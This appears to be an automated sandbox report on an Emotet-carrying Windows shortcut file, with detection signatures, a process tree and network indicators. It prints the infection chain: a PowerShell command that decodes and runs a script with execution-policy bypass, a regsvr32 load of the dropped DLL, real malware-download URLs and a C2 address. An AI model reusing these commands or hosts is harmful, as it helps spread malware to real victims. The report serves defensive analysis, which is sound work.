
Windows Analysis Report
2022-04-26_1045.exe.lnk

Overview

General Information

Sample Name: 2022-04-26_1045.exe.lnk
Analysis ID: 615497
MD5: a4e45d28631ea2dd178f314f1362f213
SHA1: ae71fe52df0fa3762866eeb6fb4829cc7c6877ce
SHA256: 0110ac3095c40757e96ec0d66c639cdbdb7c1247eed0ed79281820423f164992

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sigma detected: BlueMashroom DLL Load
Multi AV Scanner detection for domain / URL
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Regsvr32 Anomaly
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Suspicious powershell command line found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Regsvr32 Network Activity
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Change PowerShell Policies to an Unsecure Level
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • powershell.exe (PID: 6424 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
      • regsvr32.exe (PID: 6932 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq MD5: D78B75FC68247E8A63ACBA846182740E)
        • regsvr32.exe (PID: 7132 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Atpvfjzdexae\enxldhj.oxc" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 7060 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7148 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 908 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5712 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5516 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5816 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6920 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5672 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6916 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4756 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
Source | Rule | Description | Author | Strings
00000008.00000002.518723563.0000000002CD1000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000006.00000002.296695809.00000000013B1000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000006.00000002.296664424.0000000001380000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000008.00000002.518667146.0000000002C90000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
Process Memory Space: powershell.exe PID: 6424 | PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth
  • 0x89943:$sa2: -encodedCommand
  • 0x8996f:$sa2: -encodedCommand
  • 0x8a05b:$sa2: -EncodedCommand
  • 0x8ab7c:$sa2: -EncodedCommand
  • 0x8ac17:$sa2: -encodedCommand
  • 0x89e36:$sc2: -NoProfile
  • 0x5f4ef:$sd2: -NonInteractive
  • 0x89e77:$sd2: -NonInteractive
  • 0x69c5:$se3: -executionpolicy bypass
  • 0x1964f:$se3: -executionpolicy bypass
  • 0x19a80:$se3: -executionpolicy bypass
  • 0x1a496:$se3: -executionpolicy bypass
  • 0x1a940:$se3: -executionpolicy bypass
  • 0x1ae85:$se3: -executionpolicy bypass
  • 0x1b2b5:$se3: -executionpolicy bypass
  • 0x1bf7a:$se3: -executionpolicy bypass
  • 0x1c5a0:$se3: -executionpolicy bypass
  • 0x3f11c:$se3: -executionpolicy bypass
  • 0x3f541:$se3: -executionpolicy bypass
  • 0x3fc99:$se3: -executionpolicy bypass
  • 0x40143:$se3: -executionpolicy bypass
Source | Rule | Description | Author | Strings
8.2.regsvr32.exe.2c90000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
8.2.regsvr32.exe.2c90000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
6.2.regsvr32.exe.1380000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
6.2.regsvr32.exe.1380000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

System Summary

Source: Process started | Author: Florian Roth, Tim Shelton | Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, ProcessId: 6932, ProcessName: regsvr32.exe
Source: Process started | Author: Florian Roth, Max Altgelt | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ProcessId: 6624, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth, oscd.community | Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, ProcessId: 6932, ProcessName: regsvr32.exe
Source: Network Connection | Author: Dmitriy Lifanov, oscd.community | Data: DestinationIp: 138.201.142.73, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 7132, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49756
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp/GMOWDTRfIJ.xtq, ProcessId: 6932, ProcessName: regsvr32.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ProcessId: 6624, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ProcessId: 6624, ProcessName: powershell.exe
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132954651733505451.6424.DefaultAppDomain.powershell
Source: Process started | Author: frack113 | Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')) > "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1"; Remove-Item "C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6424, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 6432, ProcessName: conhost.exe
Timestamp: 04/26/22-09:46:56.833835
SID: 2404310
Source Port: 49756
Destination Port: 8080
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 6.2.regsvr32.exe.1380000.0.raw.unpack | Malware Configuration Extractor: Emotet (extracted configuration with 63 C2 IP:port entries and two public keys; the raw list is omitted here)
Source: 2022-04-26_1045.exe.lnk | Virustotal: Detection: 32%
Source: http://focusmedica.in/fmlib/IxB | Avira URL Cloud: Label: malware
Source: http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/ | Avira URL Cloud: Label: malware
Source: http://filmmogzivota.rs/SpryAssets/gDR/ | Avira URL Cloud: Label: malware
Source: http://colegiounamuno.es/cgi-bin/E/ | Avira URL Cloud: Label: malware
Source: http://focusmedica.in/ | Avira URL Cloud: Label: malware
Source: https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/ | Avira URL Cloud: Label: malware
Source: http://focusmedica.in | Avira URL Cloud: Label: malware
Source: http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/ | Avira URL Cloud: Label: malware
Source: http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/ | Avira URL Cloud: Label: malware
Source: focusmedica.in | Virustotal: Detection: 13%
Source: 2022-04-26_1045.exe.lnk | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\GMOWDTRfIJ.xtq | Joe Sandbox ML: detected
Source: C:\Windows\System32\regsvr32.exe | Code function: 8_2_02CE8CAC FindFirstFileW,FindNextFileW,FindClose, 8_2_02CE8CAC

Networking

Source: Traffic | Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.3:49756 -> 138.201.142.73:8080
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 138.201.142.73 8080
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | ASN Name: PLUSSERVER-ASN1DE
Source: Joe Sandbox View | IP Address: 151.106.112.196
Source: Joe Sandbox View | IP Address: 110.232.117.186
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
Date: Tue, 26 Apr 2022 07:46:23 GMT
Server: Apache
X-Powered-By: PHP/7.3.33
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Tue, 26 Apr 2022 07:46:23 GMT
Content-Disposition: attachment; filename="EeL9HdVdV8PNPDkaAx3wjw.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 6267a34f2b816=1650959183; expires=Tue, 26-Apr-2022 07:47:23 GMT; Max-Age=60; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 26 Apr 2022 07:46:23 GMT
Content-Length: 473088
Keep-Alive: timeout=5
Content-Type: application/x-msdownload
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Mu,
(raw hex dump of the PE response body omitted)
Source: global traffic | HTTP traffic detected: GET /fmlib/IxBABMh0I2cLM3qq1GVv/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
Host: focusmedica.in
Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.3:49756 -> 138.201.142.73:8080
Source: unknown | Network traffic detected: IP country count 28
Source: unknown | TCP traffic detected without corresponding DNS query: 138.201.142.73
Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.402537756.00000278A4585000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-04-21T14:07:02.1326283Z||.||f28b89c1-eba5-4d1c-9897-a92fbb0d304e||1152921505694753097||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
Source: svchost.exe, 00000014.00000003.402282768.00000278A4574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.402537756.00000278A4585000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free 